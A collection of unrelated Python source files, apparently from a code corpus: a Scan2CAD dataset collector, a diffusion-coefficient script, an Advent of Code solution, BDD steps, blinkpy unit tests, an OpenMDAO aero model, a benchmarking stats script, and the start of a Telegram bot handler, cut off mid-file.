0
5527
<gh_stars>0 # <NAME>, UVR KAIST @<EMAIL> import os, sys import json import h5py import numpy as np import quaternion import torch from torch.utils.data import Dataset BASE_DIR_1 = os.path.dirname(os.path.abspath(__file__)) # scan2cad BASE_DIR = os.path.dirname(BASE_DIR_1) # dataset ROOT_DIR = os.path.dirname(BASE_DIR) # PointGroup DATA_DIR = os.path.dirname(ROOT_DIR) # /root/ DATA_DIR = os.path.join(DATA_DIR, 'Dataset') # /root/Dataset DUMP_DIR = os.path.join(ROOT_DIR, 'data') sys.path.append(BASE_DIR) sys.path.append(ROOT_DIR) from s2c_map import CLASS_MAPPING, ID2NAME, CARED_CLASS_MASK from s2c_config import Scan2CADDatasetConfig import s2c_utils sys.path.append(os.path.join(ROOT_DIR, 'models/retrieval/')) DC = Scan2CADDatasetConfig() MAX_NUM_POINT = 50000 MAX_NUM_OBJ = 64 INS_NUM_POINT = 2048 FEATURE_DIMENSION = 512 MAX_DATA_SIZE = 15000 CHUNK_SIZE = 1000 INF = 9999 NOT_CARED_ID = np.array([INF]) # wall, floor # Thresholds PADDING = 0.05 SCALE_THRASHOLD = 0.05 SEG_THRESHOLD = 1 REMAPPER = np.ones(35, dtype=np.int64) * (-1) for i, x in enumerate(CARED_CLASS_MASK): REMAPPER[x] = i print(f'REMAPPER[{x:2d}] => {i:2d}') SYM2CLASS = {"__SYM_NONE": 0, "__SYM_ROTATE_UP_2": 1, "__SYM_ROTATE_UP_4": 2, "__SYM_ROTATE_UP_INF": 3} # functions ============================================================================================== def from_q_to_6d(q): q = np.quaternion(q[0], q[1], q[2], q[3]) mat = quaternion.as_rotation_matrix(q) # 3x3 rep6d = mat[:, 0:2].transpose().reshape(-1, 6) # 6 return rep6d def nn_search(p, ps): target = torch.from_numpy(ps.copy()) p = torch.from_numpy(p.copy()) p_diff = target - p p_dist = torch.sum(p_diff**2, dim=-1) dist, idx = torch.min(p_dist, dim=-1) return dist.item(), idx.item() def make_M_from_tqs(t, q, s): q = np.quaternion(q[0], q[1], q[2], q[3]) T = np.eye(4) T[0:3, 3] = t R = np.eye(4) R[0:3, 0:3] = quaternion.as_rotation_matrix(q) S = np.eye(4) S[0:3, 0:3] = np.diag(s) M = T.dot(R).dot(S) return M def compose_mat4(t, q, s, center=None): if not isinstance(q, np.quaternion): q = np.quaternion(q[0], q[1], q[2], q[3]) T = np.eye(4) T[0:3, 3] = t R = np.eye(4) R[0:3, 0:3] = quaternion.as_rotation_matrix(q) S = np.eye(4) S[0:3, 0:3] = np.diag(s) C = np.eye(4) if center is not None: C[0:3, 3] = center M = T.dot(R).dot(S).dot(C) return M def decompose_mat4(M): R = M[0:3, 0:3].copy() sx = np.linalg.norm(R[0:3, 0]) sy = np.linalg.norm(R[0:3, 1]) sz = np.linalg.norm(R[0:3, 2]) s = np.array([sx, sy, sz]) R[:,0] /= sx R[:,1] /= sy R[:,2] /= sz q = quaternion.from_rotation_matrix(R[0:3, 0:3]) t = M[0:3, 3] return t, q, s # ======================================================================================================== LOG_N = 100 def print_log(log): print('-'*LOG_N+'\n'+log+' \n'+'-'*LOG_N) class Scan2CADCollect(Dataset): def __init__(self, split_set='train', distr_check=False): self.data_path = os.path.join(DATA_DIR, 'Scan2CAD/export') self.out_path = os.path.join(BASE_DIR_1, 'data4') if not os.path.exists(self.out_path): os.mkdir(self.out_path) print("Create export directory: {}".format(self.out_path)) all_scan_names = list(set([os.path.basename(x)[0:12] \ for x in os.listdir(self.data_path) if x.startswith('scene')])) self.scan_names = [] if split_set in ['all', 'train', 'val', 'test']: split_filenames = os.path.join(BASE_DIR_1, 'meta_data', 'scan2cad_{}.txt'.format(split_set)) with open(split_filenames, 'r') as f: self.scan_list = f.read().splitlines() # remove unavailiable scans num_scans = len(self.scan_list) self.scan_list = [sname for sname in self.scan_list \ if sname in all_scan_names] print_log('Dataset for {}: kept {} scans out of {}'.format(split_set, len(self.scan_list), num_scans)) num_scans = len(self.scan_list) else: print('illegal split name') return filename_json = BASE_DIR_1 + "/full_annotations.json" assert filename_json self.dataset = {} cat_summary = dict.fromkeys(DC.ClassToName, 0) cat_ids = [] with open(filename_json, 'r') as f: data = json.load(f) d = {} i = -1 for idx, r in enumerate(data): i_scan = r["id_scan"] if i_scan not in self.scan_list: continue self.scan_names.append(i_scan) i += 1 d[i] = {} d[i]['id_scan'] = i_scan d[i]['trs'] = r["trs"] n_model = r["n_aligned_models"] d[i]['n_total'] = n_model d[i]['models'] = {} for j in range(n_model): d[i]['models'][j] = {} d[i]['models'][j]['trs'] = r["aligned_models"][j]['trs'] d[i]['models'][j]['center'] = r["aligned_models"][j]['center'] d[i]['models'][j]['bbox'] = r["aligned_models"][j]['bbox'] d[i]['models'][j]['sym'] = SYM2CLASS[r["aligned_models"][j]['sym']] d[i]['models'][j]['fname'] = r["aligned_models"][j]['id_cad'] cat_id = r["aligned_models"][j]['catid_cad'] cat_ids.append(cat_id) d[i]['models'][j]['cat_id'] = cat_id cat_class = DC.ShapenetIDtoClass(cat_id) d[i]['models'][j]['sem_cls'] = cat_class # category summary cat_summary[cat_class]+=1 self.dataset = d self.cat_ids = np.unique(cat_ids) if distr_check: for k, v in sorted(cat_summary.items(), key=lambda item:item[1], reverse=True): print(f'{k:2d}: {DC.ClassToName[k]:12s} => {v:4d}') def __len__(self): return len(self.dataset) def size_check(self, scale, id_scan, sem_cls): check = False if scale[0] < SCALE_THRASHOLD: scale[0] = SCALE_THRASHOLD check = True if scale[1] < SCALE_THRASHOLD: scale[1] = SCALE_THRASHOLD check = True if scale[2] < SCALE_THRASHOLD: scale[2] = SCALE_THRASHOLD check = True return scale def collect(self, N, dump=False): """ Return dictionary of {verts(x,y,z): cad filename} Note: NK = a total number of instances in dataset V = a number of vertices args: N: int a size of dataset return: dict: (NK, 1, V, 3) a dictionary for verts-cad_file pairs """ # ======= GLOBAL LABEL VARIABLES ======= error_scan = {} # Text # Anchor collection (for detection) print_log(" LOADING SCENES") collect_path = os.path.join(BASE_DIR, 'collect') for index in range(N): data = self.dataset[index] id_scan = data['id_scan'] K = data['n_total'] assert(K <= MAX_NUM_OBJ) # Point Cloud mesh_vertices = np.load(os.path.join(self.data_path, id_scan) + '_vert.npy') # (N, 3) semantic_labels = np.load(os.path.join(self.data_path, id_scan) + '_sem_label.npy') # (N, sem_cls(0, 1~35, 36~MAX, INF)) point_cloud = mesh_vertices[:,0:3] colors = mesh_vertices[:,3:6] / 127.5 - 1 instance_vertices = np.ones((point_cloud.shape[0]), dtype=np.int64) * (-1) semantic_vertices = np.ones((point_cloud.shape[0]), dtype=np.int64) * (-1) # Sorting points cropping order to avoid overlapping sort_by_scale = {} for model in range(K): obj_scale = np.array(data['models'][model]['trs']['scale']) sort_by_scale[model] = np.sum(obj_scale) model_scale_order = {model: scale for model, scale in sorted(sort_by_scale.items(), key=(lambda item:item[1]), reverse=True)} K = len(model_scale_order.keys()) # Iterate on scale_order checked = False k = -1 for i, model in enumerate(model_scale_order.keys()): k += 1 # semantics () sem_cls = data['models'][model]['sem_cls'] # (0~num_classes-1) # Transform obj_center = np.array(data['models'][model]['center']) obj_translation = np.array(data['models'][model]['trs']['translation']) obj_rotation = np.array(data['models'][model]['trs']['rotation']) obj_scale = np.array(data['models'][model]['trs']['scale']) obj_scale = self.size_check(obj_scale, id_scan, sem_cls) Mobj = compose_mat4(obj_translation, obj_rotation, obj_scale, obj_center) # Instance vertices # - (1) Region Crop & Axis-aligned Bounding Box vert_choices = np.array([]) ins_bbox = np.array(data['models'][model]['bbox']) obj_corners = s2c_utils.get_3d_box_rotated(ins_bbox, Mobj, padding=PADDING) ex_points, obj_vert_ind = s2c_utils.extract_pc_in_box3d(point_cloud, obj_corners) nx = ex_points.shape[0] # - (2) Instance Segments Crop seg_points, vert_choices = \ s2c_utils.filter_dominant_cls(point_cloud, obj_vert_ind, semantic_labels, sem_cls+1, NOT_CARED_ID) seg_nx = seg_points.shape[0] # ======= Semantic/Instance vertices ======= if seg_nx < SEG_THRESHOLD: k -= 1 checked = True continue sem_cls = REMAPPER[sem_cls] # if sem_cls < 0: continue # ignore non-valid class object (only preserve CARED classes) instance_vertices[vert_choices] = k # (0~K-1) NOTE:unannotated=-1 semantic_vertices[vert_choices] = sem_cls # (0~num_classes-1) NOTE:unannotated=-1 # error check ins_list = np.unique(instance_vertices) if (np.max(instance_vertices)+1) != (len(ins_list)-1): print_log(f"[{index}/{N} Error] Please check this scene --> {id_scan}") error_scan[id_scan] = 0 continue # DUMP COLLECT RESULTS if dump: scene_path = os.path.join(collect_path, f'{id_scan}') if not os.path.exists(scene_path): os.mkdir(scene_path) print("Created scene directory: {}".format(scene_path)) s2c_utils.write_scene_results(points=point_cloud, ins_points=instance_vertices, num_instances=K, bboxes=None, file_path=scene_path) point_cloud = np.ascontiguousarray(point_cloud[:, :3] - point_cloud[:, :3].mean(0)) pcoord = point_cloud.astype(np.float64) colors = colors.astype(np.float32) sem_labels = semantic_vertices.astype(np.float64) ins_labels = instance_vertices.astype(np.float64) # ============ DUMP ============ # scene data file_path = os.path.join(self.out_path, id_scan+'_inst.pth') torch.save((pcoord, colors, sem_labels, ins_labels), file_path) print(f"[{index}/{N} Saved] {id_scan} >>> {file_path}") # error scan with open(self.out_path+'/error_scan.txt', 'w') as f: print_log("ERROR SCAN") for i, sname in enumerate(error_scan.keys()): print('{:2d}: {}'.format(i, sname)) f.write(sname) f.write('\n') if __name__ == "__main__": Dataset = Scan2CADCollect(split_set='all', distr_check=True) N = len(Dataset) Dataset.collect(N, dump=False)
1.789063
2
nappy/msd2diff.py
ryokbys/nap
27
5528
#!/usr/bin/env python """ Compute diffusion coefficient from MSD data. Time interval, DT, is obtained from in.pmd in the same directory. Usage: msd2diff.py [options] MSD_FILE Options: -h, --help Show this message and exit. -o, --offset OFFSET Offset of given data. [default: 0] --plot Plot a fitted graph. [default: False] """ from __future__ import print_function import os,sys from docopt import docopt import numpy as np __author__ = "<NAME>" __version__ = "191212" def read_out_msd(fname='out.msd',offset=0,specorder=[],spc=None): if specorder == [] or spc not in specorder: index = 1 else: index = specorder.index(spc) +1 with open(fname,'r') as f: lines = f.readlines() try: dname = os.path.dirname(fname) dt = dt_from_inpmd(fname=dname+'/in.pmd') except Exception as e: raise RuntimeError('Failed to read in.pmd.') ts = [] msds = [] n0 = 0 msd0 = 0.0 for il,line in enumerate(lines): if line[0] == '#': continue data = line.split() if il < offset: n0 = int(data[0]) msd0 = float(data[index]) continue n = int(data[0]) msd = float(data[index]) ts.append((n-n0)*dt) msds.append(msd-msd0) return np.array(ts),np.array(msds) def dt_from_inpmd(fname='in.pmd'): with open(fname,'r') as f: lines = f.readlines() for line in lines: if 'time_interval' in line: time_interval = abs(float(line.split()[1])) elif 'num_iteration' in line: num_iteration = int(line.split()[1]) elif 'num_out_pos' in line or 'num_out_pmd' in line: num_out_pos = int(line.split()[1]) return time_interval*num_iteration/num_out_pos def msd2D(ts,msds,fac,dim=3): """ Compute diffusion coefficient from time [fs] vs MSD [Ang^2] data by solving least square problem using numpy. Return diffusion coefficient multiplied by FAC. """ A= np.array([ts, np.ones(len(ts))]) A = A.T xvar = np.var(A[:,0]) p,res,_,_ = np.linalg.lstsq(A,msds,rcond=None) a = p[0] b = p[1] # fac = 1.0e-16 /1.e-15 a = a *fac /(2.0*dim) b = b *fac # print(res[0],xvar,np.mean(A[:,0]),len(ts)) std = np.sqrt(res[0]/len(ts)/xvar) *fac /(2.0*dim) return a,b,std if __name__ == "__main__": args = docopt(__doc__) fname = args['MSD_FILE'] offset = int(args['--offset']) plot = args['--plot'] ts,msds = read_out_msd(fname,offset) #...Assuming input MSD unit in A^2/fs and output in cm^2/s fac = 1.0e-16 /1.0e-15 #...Least square a,b,std = msd2D(ts,msds,fac) print(' Diffusion coefficient = {0:12.4e}'.format(a)+ ' +/- {0:12.4e} [cm^2/s]'.format(std)) if plot: import matplotlib.pyplot as plt import seaborn as sns sns.set(context='talk',style='ticks') #...Original time unit == fs unit = 'fs' tfac = 1.0 if ts[-1] > 1.0e+5: #...if max t > 100ps, time unit in ps unit = 'ps' tfac = 1.0e-3 plt.xlabel('Time ({0:s})'.format(unit)) plt.ylabel('MSD (A^2/{0:s})'.format(unit)) fvals = np.array([ (t*a+b)/fac for t in ts ]) plt.plot(ts*tfac,msds/tfac,'b-',label='MSD data') plt.plot(ts*tfac,fvals/tfac,'r-',label='Fitted curve') plt.savefig("graph_msd2D.png", format='png', dpi=300, bbox_inches='tight') print(' Wrote graph_msd2D.png')
2.609375
3
5/part2.py
jcsesznegi/advent-of-code-2017
1
5529
<filename>5/part2.py<gh_stars>1-10 import os f = open(os.path.join(os.path.dirname(__file__), '../input/5/part2.txt'), 'r') class InstructionSet: def __init__(self, instructions): self.instructions = instructions self.currentIndex = 0 self.numberSteps = 0 def _changeOffsetValue(self, index): if self.instructions[index] >= 3: self.instructions[index] -= 1 else: self.instructions[index] += 1 def jump(self): self.numberSteps += 1 jumpNumber = self.instructions[self.currentIndex] oldIndex = self.currentIndex self.currentIndex += jumpNumber self._changeOffsetValue(oldIndex) def run(self): while (self.currentIndex >= 0 and self.currentIndex < len(self.instructions)): self.jump() def main(): def formatLine(line): return int(line.rstrip()) line = f.readline() instructions = [] while line: instructions.append(formatLine(line)) line = f.readline() instructionSet = InstructionSet(instructions) instructionSet.run() print(instructionSet.numberSteps) if __name__ == '__main__': main()
3.328125
3
features/steps/basic_account_add_bdd.py
MhmdRyhn/behavior_test
0
5530
<reponame>MhmdRyhn/behavior_test import behave @behave.when('I add $1200 to my account') def add_usd_1200(context): context.account.add_cash(amount=1200) @behave.then('It becomes $3200 in my account') def check_for_increase_to_usd_1880(context): assert context.account.current_cash == 3200
2.84375
3
tests/test_sync_module.py
naveengh6/blinkpy
272
5531
<reponame>naveengh6/blinkpy """Tests camera and system functions.""" import unittest from unittest import mock from blinkpy.blinkpy import Blink from blinkpy.helpers.util import BlinkURLHandler from blinkpy.sync_module import BlinkSyncModule, BlinkOwl from blinkpy.camera import BlinkCamera, BlinkCameraMini @mock.patch("blinkpy.auth.Auth.query") class TestBlinkSyncModule(unittest.TestCase): """Test BlinkSyncModule functions in blinkpy.""" def setUp(self): """Set up Blink module.""" self.blink = Blink(motion_interval=0) self.blink.last_refresh = 0 self.blink.urls = BlinkURLHandler("test") self.blink.sync["test"] = BlinkSyncModule(self.blink, "test", "1234", []) self.camera = BlinkCamera(self.blink.sync) self.mock_start = [ { "syncmodule": { "id": 1234, "network_id": 5678, "serial": "12345678", "status": "foobar", } }, {"event": True}, {}, {}, None, {"devicestatus": {}}, ] self.blink.sync["test"].network_info = {"network": {"armed": True}} def tearDown(self): """Clean up after test.""" self.blink = None self.camera = None self.mock_start = None def test_bad_status(self, mock_resp): """Check that we mark module unavaiable on bad status.""" self.blink.sync["test"].status = None self.blink.sync["test"].available = True self.assertFalse(self.blink.sync["test"].online) self.assertFalse(self.blink.sync["test"].available) def test_bad_arm(self, mock_resp): """Check that we mark module unavaiable if bad arm status.""" self.blink.sync["test"].network_info = None self.blink.sync["test"].available = True self.assertEqual(self.blink.sync["test"].arm, None) self.assertFalse(self.blink.sync["test"].available) self.blink.sync["test"].network_info = {} self.blink.sync["test"].available = True self.assertEqual(self.blink.sync["test"].arm, None) self.assertFalse(self.blink.sync["test"].available) def test_get_events(self, mock_resp): """Test get events function.""" mock_resp.return_value = {"event": True} self.assertEqual(self.blink.sync["test"].get_events(), True) def test_get_events_fail(self, mock_resp): """Test handling of failed get events function.""" mock_resp.return_value = None self.assertFalse(self.blink.sync["test"].get_events()) mock_resp.return_value = {} self.assertFalse(self.blink.sync["test"].get_events()) def test_get_camera_info(self, mock_resp): """Test get camera info function.""" mock_resp.return_value = {"camera": ["foobar"]} self.assertEqual(self.blink.sync["test"].get_camera_info("1234"), "foobar") def test_get_camera_info_fail(self, mock_resp): """Test handling of failed get camera info function.""" mock_resp.return_value = None self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {}) mock_resp.return_value = {} self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {}) mock_resp.return_value = {"camera": None} self.assertEqual(self.blink.sync["test"].get_camera_info("1"), {}) def test_get_network_info(self, mock_resp): """Test network retrieval.""" mock_resp.return_value = {"network": {"sync_module_error": False}} self.assertTrue(self.blink.sync["test"].get_network_info()) mock_resp.return_value = {"network": {"sync_module_error": True}} self.assertFalse(self.blink.sync["test"].get_network_info()) def test_get_network_info_failure(self, mock_resp): """Test failed network retrieval.""" mock_resp.return_value = {} self.blink.sync["test"].available = True self.assertFalse(self.blink.sync["test"].get_network_info()) self.assertFalse(self.blink.sync["test"].available) self.blink.sync["test"].available = True mock_resp.return_value = None self.assertFalse(self.blink.sync["test"].get_network_info()) self.assertFalse(self.blink.sync["test"].available) def test_check_new_videos_startup(self, mock_resp): """Test that check_new_videos does not block startup.""" sync_module = self.blink.sync["test"] self.blink.last_refresh = None self.assertFalse(sync_module.check_new_videos()) def test_check_new_videos(self, mock_resp): """Test recent video response.""" mock_resp.return_value = { "media": [ { "device_name": "foo", "media": "/foo/bar.mp4", "created_at": "1990-01-01T00:00:00+00:00", } ] } sync_module = self.blink.sync["test"] sync_module.cameras = {"foo": None} sync_module.blink.last_refresh = 0 self.assertEqual(sync_module.motion, {}) self.assertTrue(sync_module.check_new_videos()) self.assertEqual( sync_module.last_record["foo"], {"clip": "/foo/bar.mp4", "time": "1990-01-01T00:00:00+00:00"}, ) self.assertEqual(sync_module.motion, {"foo": True}) mock_resp.return_value = {"media": []} self.assertTrue(sync_module.check_new_videos()) self.assertEqual(sync_module.motion, {"foo": False}) self.assertEqual( sync_module.last_record["foo"], {"clip": "/foo/bar.mp4", "time": "1990-01-01T00:00:00+00:00"}, ) def test_check_new_videos_old_date(self, mock_resp): """Test videos return response with old date.""" mock_resp.return_value = { "media": [ { "device_name": "foo", "media": "/foo/bar.mp4", "created_at": "1970-01-01T00:00:00+00:00", } ] } sync_module = self.blink.sync["test"] sync_module.cameras = {"foo": None} sync_module.blink.last_refresh = 1000 self.assertTrue(sync_module.check_new_videos()) self.assertEqual(sync_module.motion, {"foo": False}) def test_check_no_motion_if_not_armed(self, mock_resp): """Test that motion detection is not set if module unarmed.""" mock_resp.return_value = { "media": [ { "device_name": "foo", "media": "/foo/bar.mp4", "created_at": "1990-01-01T00:00:00+00:00", } ] } sync_module = self.blink.sync["test"] sync_module.cameras = {"foo": None} sync_module.blink.last_refresh = 1000 self.assertTrue(sync_module.check_new_videos()) self.assertEqual(sync_module.motion, {"foo": True}) sync_module.network_info = {"network": {"armed": False}} self.assertTrue(sync_module.check_new_videos()) self.assertEqual(sync_module.motion, {"foo": False}) def test_check_multiple_videos(self, mock_resp): """Test motion found even with multiple videos.""" mock_resp.return_value = { "media": [ { "device_name": "foo", "media": "/foo/bar.mp4", "created_at": "1970-01-01T00:00:00+00:00", }, { "device_name": "foo", "media": "/bar/foo.mp4", "created_at": "1990-01-01T00:00:00+00:00", }, { "device_name": "foo", "media": "/foobar.mp4", "created_at": "1970-01-01T00:00:01+00:00", }, ] } sync_module = self.blink.sync["test"] sync_module.cameras = {"foo": None} sync_module.blink.last_refresh = 1000 self.assertTrue(sync_module.check_new_videos()) self.assertEqual(sync_module.motion, {"foo": True}) expected_result = { "foo": {"clip": "/bar/foo.mp4", "time": "1990-01-01T00:00:00+00:00"} } self.assertEqual(sync_module.last_record, expected_result) def test_check_new_videos_failed(self, mock_resp): """Test method when response is unexpected.""" mock_resp.side_effect = [None, "just a string", {}] sync_module = self.blink.sync["test"] sync_module.cameras = {"foo": None} sync_module.motion["foo"] = True self.assertFalse(sync_module.check_new_videos()) self.assertFalse(sync_module.motion["foo"]) sync_module.motion["foo"] = True self.assertFalse(sync_module.check_new_videos()) self.assertFalse(sync_module.motion["foo"]) sync_module.motion["foo"] = True self.assertFalse(sync_module.check_new_videos()) self.assertFalse(sync_module.motion["foo"]) def test_sync_start(self, mock_resp): """Test sync start function.""" mock_resp.side_effect = self.mock_start self.blink.sync["test"].start() self.assertEqual(self.blink.sync["test"].name, "test") self.assertEqual(self.blink.sync["test"].sync_id, 1234) self.assertEqual(self.blink.sync["test"].network_id, 5678) self.assertEqual(self.blink.sync["test"].serial, "12345678") self.assertEqual(self.blink.sync["test"].status, "foobar") def test_unexpected_summary(self, mock_resp): """Test unexpected summary response.""" self.mock_start[0] = None mock_resp.side_effect = self.mock_start self.assertFalse(self.blink.sync["test"].start()) def test_summary_with_no_network_id(self, mock_resp): """Test handling of bad summary.""" self.mock_start[0]["syncmodule"] = None mock_resp.side_effect = self.mock_start self.assertFalse(self.blink.sync["test"].start()) def test_summary_with_only_network_id(self, mock_resp): """Test handling of sparse summary.""" self.mock_start[0]["syncmodule"] = {"network_id": 8675309} mock_resp.side_effect = self.mock_start self.blink.sync["test"].start() self.assertEqual(self.blink.sync["test"].network_id, 8675309) def test_unexpected_camera_info(self, mock_resp): """Test unexpected camera info response.""" self.blink.sync["test"].cameras["foo"] = None self.mock_start[5] = None mock_resp.side_effect = self.mock_start self.blink.sync["test"].start() self.assertEqual(self.blink.sync["test"].cameras, {"foo": None}) def test_missing_camera_info(self, mock_resp): """Test missing key from camera info response.""" self.blink.sync["test"].cameras["foo"] = None self.mock_start[5] = {} self.blink.sync["test"].start() self.assertEqual(self.blink.sync["test"].cameras, {"foo": None}) def test_sync_attributes(self, mock_resp): """Test sync attributes.""" self.assertEqual(self.blink.sync["test"].attributes["name"], "test") self.assertEqual(self.blink.sync["test"].attributes["network_id"], "1234") def test_owl_start(self, mock_resp): """Test owl camera instantiation.""" response = { "name": "foo", "id": 2, "serial": "foobar123", "enabled": True, "network_id": 1, "thumbnail": "/foo/bar", } self.blink.last_refresh = None self.blink.homescreen = {"owls": [response]} owl = BlinkOwl(self.blink, "foo", 1234, response) self.assertTrue(owl.start()) self.assertTrue("foo" in owl.cameras) self.assertEqual(owl.cameras["foo"].__class__, BlinkCameraMini)
2.578125
3
dymos/examples/min_time_climb/aero/aero.py
naylor-b/dymos
0
5532
from __future__ import absolute_import import numpy as np from openmdao.api import Group from .dynamic_pressure_comp import DynamicPressureComp from .lift_drag_force_comp import LiftDragForceComp from .cd0_comp import CD0Comp from .kappa_comp import KappaComp from .cla_comp import CLaComp from .cl_comp import CLComp from .cd_comp import CDComp from .mach_comp import MachComp class AeroGroup(Group): """ The purpose of the AeroGroup is to compute the aerodynamic forces on the aircraft in the body frame. Parameters ---------- v : float air-relative velocity (m/s) sos : float local speed of sound (m/s) rho : float atmospheric density (kg/m**3) alpha : float angle of attack (rad) S : float aerodynamic reference area (m**2) """ def initialize(self): self.options.declare('num_nodes', types=int, desc='Number of nodes to be evaluated in the RHS') def setup(self): nn = self.options['num_nodes'] self.add_subsystem(name='mach_comp', subsys=MachComp(num_nodes=nn), promotes_inputs=['v', 'sos'], promotes_outputs=['mach']) self.add_subsystem(name='cd0_comp', subsys=CD0Comp(num_nodes=nn), promotes_inputs=['mach'], promotes_outputs=['CD0']) self.add_subsystem(name='kappa_comp', subsys=KappaComp(num_nodes=nn), promotes_inputs=['mach'], promotes_outputs=['kappa']) self.add_subsystem(name='cla_comp', subsys=CLaComp(num_nodes=nn), promotes_inputs=['mach'], promotes_outputs=['CLa']) self.add_subsystem(name='CL_comp', subsys=CLComp(num_nodes=nn), promotes_inputs=['alpha', 'CLa'], promotes_outputs=['CL']) self.add_subsystem(name='CD_comp', subsys=CDComp(num_nodes=nn), promotes_inputs=['CD0', 'alpha', 'CLa', 'kappa'], promotes_outputs=['CD']) self.add_subsystem(name='q_comp', subsys=DynamicPressureComp(num_nodes=nn), promotes_inputs=['rho', 'v'], promotes_outputs=['q']) self.add_subsystem(name='lift_drag_force_comp', subsys=LiftDragForceComp(num_nodes=nn), promotes_inputs=['CL', 'CD', 'q', 'S'], promotes_outputs=['f_lift', 'f_drag'])
2.3125
2
stats.py
jakeb1996/SBS
0
5533
import matplotlib.pyplot as plt import argparse, csv, numpy, time, os, re def main(resultsFile, toolName): filesToCalc = [] toolNames = [] if os.path.isfile(resultsFile): # the user must have defined an exact file to plot filesToCalc.append(resultsFile) toolNames.append(toolName) else: # check if there are multiple files matching the criteria dir = (os.sep).join(resultsFile.split(os.sep)[:-1]) fileNameStart = resultsFile.split(os.sep)[-1] for (dirpath, dirnames, filenames) in os.walk(dir): for filename in filenames: reMatch = re.search('%s_((aggregate|system)|(\d)+)\\b' % fileNameStart, filename) if bool(reMatch): filesToCalc.append(os.path.join(dirpath, filename)) toolNames.append('%s %s' %(toolName, reMatch.group(1).title())) # start plotting i = 0 while i < len(filesToCalc): stat(filesToCalc[i], toolNames[i]) i = i + 1 def stat(resultsFile, toolName): print 'Running for: %s\n' % toolName TIME_ELAPSED = [] TIME_GAPS = [] config = { 'data-type-default' : int } # the aggregate functions to perform on each set. each is a function name. # user-defined functions at bottom of file stats = [len, min, q1, median, mean, q3, max, std] measurements = { # measurement configurations must appear in the order of the associated CSV columns # --- sample --- # 'stat_name' : { # ['data-type' : float,] # 'data' : [], # 'title' : 'measurement title' # }, # --- end sample --- ### START CHILD PROCESS STATS ### 'time' : { 'data' : [], 'data-type' : float, 'title' : 'Time' }, 'num_threads' : { 'data' : [], 'title' : 'Number of Threads' }, 'cpu_percent' : { 'data' : [], 'data-type' : float, 'title' : 'CPU Utilisation' }, 'mem_rss' : { 'data' : [], 'data-type' : float, 'title' : 'Resident Set Size (RSS) Memory Utilisation' }, 'mem_vms' : { 'data' : [], 'title' : 'Virtual Memory Size (VMS) Memory Utilisation' }, 'io_read_count' : { 'data' : [], 'title' : 'Disk IO Read Count' }, 'io_read_bytes' : { 'data' : [], 'title' : 'Disk IO Read Volume' }, 'io_write_count' : { 'data' : [], 'title' : 'Disk IO Write Count' }, 'io_write_bytes' : { 'data' : [], 'title' : 'Disk IO Write Volume' }, 'child_process_count' : { 'data' : [], 'title' : 'Child Process Count' }, ### START SYSTEM STATS ### # if the stat was defined above, then don't define it again 'mem_used' : { 'data' : [], 'data-type' : float, 'title' : 'Physical Memory Used (megabytes)' }, 'mem_avai' : { 'data' : [], 'data-type' : float, 'title' : 'Physical Memory Available (megabytes)', }, 'process_count' : { 'data' : [], 'title' : 'Process Count' } } # due to dictionaries not being in order, we need to know the order the data appears and # match it with the associated plot configuration above. headerOrder = [] # put all the times in a list timeRecords = [] with open(resultsFile, 'r') as fcsv: dataCsv = csv.reader(fcsv, delimiter=',') # Set the headerOrder and remove the time column header headerOrder = dataCsv.next() firstTime = None for row in dataCsv: # Elapsed time timeRecords.append(float(row[0])) TIME_ELAPSED.append(float(row[0]) - float(timeRecords[0])) if firstTime == False: TIME_GAPS.append(float(row[0]) - measurements['time']['data'][-1]) i = 0 # skip zero as its the time (as above) for measurement in headerOrder: if 'data-type' in measurements[measurement]: measurements[measurement]['data'].append(measurements[measurement]['data-type'](row[i])) else: measurements[measurement]['data'].append(config['data-type-default'](row[i])) i += 1 firstTime = False if len(timeRecords) == 0: print 'No data recorded in %s.\nExiting.\n\n' % resultsFile return 0 resultsFileName = '%s_stats.csv' % resultsFile with open(resultsFileName, 'w') as scsv: print 'Writing to file: %s' % resultsFileName # write headers line scsv.write('measurement,%s\n' % ','.join(map(funcName, stats))) for measurement in headerOrder: line = '%s' % measurement for stat in stats: line = ('%s,%s' % (line, stat(measurements[measurement]['data']))) scsv.write('%s\n' % line) # now, because the time gaps were calculated separately, run the stats on them tool # messy, I know. sorry! line = '%s' % 'time_gaps' for stat in stats: line = ('%s,%s' % (line, stat(TIME_GAPS))) scsv.write('%s\n' % line) # write start and end time scsv.write('start_time,%s,"%s"\nend_time,%s,"%s"\ntime_elapsed,%s,sec,%s,min' % (timeRecords[0], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[0])), timeRecords[-1], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(timeRecords[-1])), (timeRecords[-1] - timeRecords[0]), ((timeRecords[-1] - timeRecords[0]) / 60))) print '\nFinished.' def q1(seq): return numpy.percentile(seq, 25) def median(seq): return numpy.percentile(seq, 50) def mean(seq): return sum(seq) / len(seq) def q3(seq): return numpy.percentile(seq, 75) def std(seq): return numpy.std(seq) def funcName(func): return func.__name__ if __name__ == "__main__": parser = argparse.ArgumentParser(description = 'Plotter for the Software Benchmarking Script') parser.add_argument('-f', help='Results file as input (in csv format)') parser.add_argument('-t', help='Name of tool', default=None) parser.add_argument('--wincntxmnu', help='Indicates SBS stats was launched from the Windows context menu. See README for help.', action='store_true') args = parser.parse_args() # Not used #if args.wincntxmnu: # args.t = raw_input('Enter the plot prefix: ') main(args.f, args.t)
2.859375
3
callback_handlers.py
andrey18106/vocabulary_bot
0
5534
<filename>callback_handlers.py # -*- coding: utf-8 -*- # ===== Default imports ===== import asyncio import logging # ===== External libs imports ===== from aiogram import Bot, Dispatcher, types from aiogram.dispatcher import FSMContext # ===== Local imports ===== from analytics import BotAnalytics from db_manager import DbManager from lang_manager import LangManager from markups_manager import MarkupManager from states.Dictionary import DictionaryQuizState, DictionaryState, DictionaryEditWordState, DictionarySearchWordState from states.Mailing import AdminMailingState import pagination class VocabularyBotCallbackHandler: """Class for Vocabulary Bot callback handlers""" def __init__(self, db_manager: DbManager, lang_manager: LangManager, markup_manager: MarkupManager, analytics: BotAnalytics, dispatcher: Dispatcher, bot: Bot): self.db = db_manager self.lang = lang_manager self.markup = markup_manager self.analytics = analytics self.dp = dispatcher self.bot = bot self.__init_handlers() def __init_handlers(self): # CALLBACK HANDLER FOR USER LANGUAGE SETTINGS @self.dp.callback_query_handler(lambda query: query.data.startswith('lang_setting_')) @self.analytics.callback_metric async def language_settings_callback_handler(query: types.CallbackQuery): """Handle selecting preferred interface language""" user_lang = 